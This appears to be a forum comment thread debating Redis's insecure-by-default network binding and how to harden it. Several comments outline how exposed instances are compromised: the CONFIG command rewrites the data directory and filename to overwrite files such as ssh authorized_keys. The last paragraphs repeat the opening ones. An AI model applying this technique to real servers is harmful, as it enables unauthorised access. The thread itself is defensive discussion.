It is NOT OK for networked server software in 2015 to be "totally insecure if exposed to the outside world" without having this warning in large letters stressed very visibly in documentation and in the software installation process!
As is, Redis should probably default to only using the UNIX socket (where filesystem permissions apply), with TCP-enabling configuration options having impossible-to-miss warnings in example configs and documentation.
In the blog post there's this part, castigating inattentive users about falling pray to this fail-open nature of Redis:
"The problem is that, whatever we state in our security page, there are a lot of Redis instances exposed to the internet unintentionally. Not because the use case requires outside clients to access Redis, but because nobody bothered to protect a given Redis instance from outside accesses via fire walling"
Sounds like the author should really have another hard think about this stance.
I have been in this position myself and I agree with your stance. Networked software should be secure by default. The assumption should be "networked" == "exposed to the Internet". From my redis.conf:
"By default Redis listens for connections from all the network interfaces available on the server."
In my case the reason Redis ended up exposed to the Internet was another dev "updated the configuration" to the default provided by the package. Okay, perhaps that was the wrong thing to do, but it simply shouldn't be that easy to expose an vulnerable service to the Internet! I understand that people should run firewalls too but a belt and braces approach should really be taken here.
PS. While I'm moaning, Jenkins is another big offender in this respect. I can't be the only person to have tried side-step its own security by having it only bind to localhost and using SSH tunnelling only to find something which can execute arbitrary code is exposed to the public Internet when the configuration is switched back to its default. Yes, a firewall would fix it, but as far as I'm concerned, Jenkins shares some of the blame for being insecure by default in the absence of one.
The way redis is pre-configured out of the box has certainly been evaluated by antirez and the rest of his team extensively. There are tons of things behind the scenes which I'm sure factor into why one might bind to every interface that we as end-users aren't aware of. Either way it's up to the engineer or IT team to perform a little due diligence and be cognizant of what their software is binding to. If something's going to be deployed, and it's networked, and it's production- spend five or ten minutes to do an impact analysis beforehand. You don't even have to do anything rigorous. Spend 5 minutes with out of the box utilities. Netstat -p and grep for whatever you added.
Back in the day, daemons (especially IRCds) would have a 'comment me to enable' line arbitrarily inserted into the generated conf file which would prevent the daemon from starting up entirely. You'd spend 10 minutes reading through the config files rather than just presuming it was configured the way you want. The belts and brace approach should be that. Stupid users won't be able to just 'gem install <foo>' or 'apt-get install <bar>' then complain so often that an engineer who has contributed so much to the community (remember Antirez was doing this for ages, as a father, operating the entire project by himself (support and all), for multiple years before he finally was able to work on it full time) has to take time out of his day to justify "hey guys, you're sort of responsible for the way you configure your daemons".
I wasn't attacking Antirez. We wouldn't be having this conversation if we didn't agree Redis is essentially good work. I was attacking insecure by default. The point is is that it's not unlikely that someone might accidentally revert to the default configuration even when due diligence was done in the first place.
Can you please go beyond vague references like "tons of things behind the scenes" and "certainly been evaluated". What's the direct answer to the question: "Why can't it just listen on loopback by default?"
I'm not sure "stupid users" and "clever Antirez" gets us any further towards a proper answer here.
In my read, redis is an engineering product, not an end-user software, like an app for android.
Whoever decides to use it should do their homework and _understand_ what they are installing.
This does not mean Redis can't harden the defaults and the documentation, but is also not a fault of Redis that people are too lazy to really understand what a software stack is doing.
FWIW: Appointment Reminder also does this. It's part of your healthy HIPAA-approved breakfast.
(One of the other things you should strongly consider, if you care about HIPAA compliance, is using either full-disk encryption or encryping the directory where Redis' data file resides. We do this with encryptfs. We also encryptfs the Tarsnap cache directory, which holds recoverable cleartext. Tarsnap archives are encrypted automatically without requiring further work.)
There also exist another dozen or so box-ticking requirements with regards to procedures and documentation, but those are the main rubber-hits-the-hard-disk things you have to do with respect to using Redis for PHI.
Oh sorry, what other things did you do to fulfill the PHI criteria? I've had PCI-DSS, SOX and federal security experience, but nothing in healthcare. As such, I was wondering what sort of security protocols were required, and how much of it (if any) is just hand-waving security theater ?
Problem is that even exposing Redis via tunnel is not really safe, because you never know what the client could be up to. You probably need a supervisor between the tunnel and the client that will manually approve each request to see if it is appropriate and doesn't contain anything illegal or malicious. That supervisor of course has to be screened by trusted body of government officials.
You might want to look at using spiped for this. It's much simpler (aka. more secure) than any ssh implementation, and because it uses one TCP connection per TCP connection, it avoids reconnection and multiplexing issues.
Good point. Btw tunneling via SSH being so easy is one reason most users gave as advice, during the Redis developers London meeting, to avoid putting SSL native support inside Redis itself.
I was going to object with "port forwarding is tcp over tcp!" but it turns out after a little research that this is totally wrong and its faster this way than openvpn: http://blog.backslasher.net/ssh-openvpn-tunneling.html . I guess I ended up thinking this because it's how the dynamic port forwarding works?
edit: Yeah, that article is not just misleading, it's constructed in a way that seems methodological enough to be concrete that it's dangerous. Different tools for different purposes, and he didn't even bother going to the vendor's own wiki to check for documentation. ugh.
Don't bother reading this rant below unless you want technical details, but that administrator misconfigured his VPN to the point where OVPN underperformed by four times what it should have been.
Its been ages since I played around with networking at a low-level (we're talking teenage years, when ARIN didn't charge for netblocks, and Cisco 7206VXR's could hold the entire internet BGP table in it), but I'll give it a go.
1) It's not a fair comparison to begin with since OpenVPN is effectively maintaining a lot more information as it's acting as either a) as is in his configuration, a Layer 3 router, there's bound to be more overhead as it's maintaining a lot more information than a single Point-to-Point SSH connection; he should be using Bridged Mode and routing via a virtual switch at L2 instead.[1] He sort of acknowledged this by making an appeal to the OSI layer, but then didn't check to see if there was a way to disable the full-routing functionality and move down to switching.
As he himself said, he's using this simply to tunnel peer-to-peer, so if he configures his subnet as a /30 on OpenVPN, defined static routes, and read this guide [2] he'd see that an MTU at ~6000 is recommended (jumbo frames indeed!). Starting with a similar config as his (using iperf), the OpenVPN guys went from ~125Mbps to ~500 mbps.
That was without kernel tuning, just parameter changing.
2) I haven't tested this, but if you read the comments within the thread (especially from those made by kasperd his networking device is misconfigured at the kernel level (for his purposes), leading to tons of fragmentation that can be rectified [see: the MTU/MSS discussion in the OP's "Read more comments"]. edit: Yep I was right. Check cite [2].
I'm sure someone who's actually in networking can address this further but this is not only apples-to-oranges but rotten-apples*-to-oranges. (where rotten-apples == a very poorly configured set of OpenVPN instances).
That I never have to care about remembering admin user names and that the configuration is so utterly trivial is part of why I love Redis so much. I am lazy and forgetful and "database systems" tend to scare me by being so complicated. I never really know if my Postgres user accounts are set up the right way. On my first job, SQL Server privileges were a frequent annoyance when deploying, testing, etc, and I'm pretty sure the whole "security" thing there was a total illusion anyway.
Given the example of being able to write stuff to the ssh authorized_keys it would be prudent to simply chroot your redis installation. It seems like a easy, if somewhat old fashion solution, to at least that part.
Generally speaking I think way to many services assume that they're allow to roam the filesystem freely, when chrooting should be "the bare minimum" one could expect.
Debian does this in the default installation, it uses capabilities I believe, not chroot, but the result is that there is a "white list" for directories where Redis can write, which are just /etc/redis/... to rewrite the config, and the dir where Redis persists.
Just been hacked through this method and cannot believe how redis can ship with such ridiculously insecure defaults, and that they don't even MENTION the security concerns from the quickstart guide, which is what the majority of people would use to get redis installed and set up.
Like having port 6379 be open to anyone who happens to wander by? Your firewall was horribly configured and you got burned, take this as a learning opportunity to fix your mistakes.
exactly, but one wrong doesn't excuse another. just because I didn't have my firewall configured correctly doesn't mean software that I use should a) have insecure defaults and b) not make a song and dance about them on the page designed to get you up and running with it.
# It is also possible to completely kill a command by renaming it into
# an empty string:
#
# rename-command CONFIG ""
I'm a big Redis fan, and have used most of its power, including the great HyperLogLog stuff, I never really looked at the CONFIG command and would not have imagined it would allow such things even.
Except if no config file is specified Redis defaults to binding to 127.0.0.1 instead of localhost? The docs even advertise:
> This is perfectly fine if you are starting Redis just to play a bit with it or for development, but for production environments you should use a configuration file.
Not to mention you can over-write arbitrary files by setting the dbfilename and config directory (Not sure why this is an interactive option to start with?).
Hmm 9 hours ago and some script kid has already performed this on my local vagrant-box? Pretty funny. I was running it behind vpn and I guess that's why it got exposed.
As is, Redis should probably default to only using the UNIX socket (where filesystem permissions apply), with TCP-enabling configuration options having impossible-to-miss warnings in example configs and documentation.
In the blog post there's this part, castigating inattentive users about falling pray to this fail-open nature of Redis:
"The problem is that, whatever we state in our security page, there are a lot of Redis instances exposed to the internet unintentionally. Not because the use case requires outside clients to access Redis, but because nobody bothered to protect a given Redis instance from outside accesses via fire walling"
Sounds like the author should really have another hard think about this stance.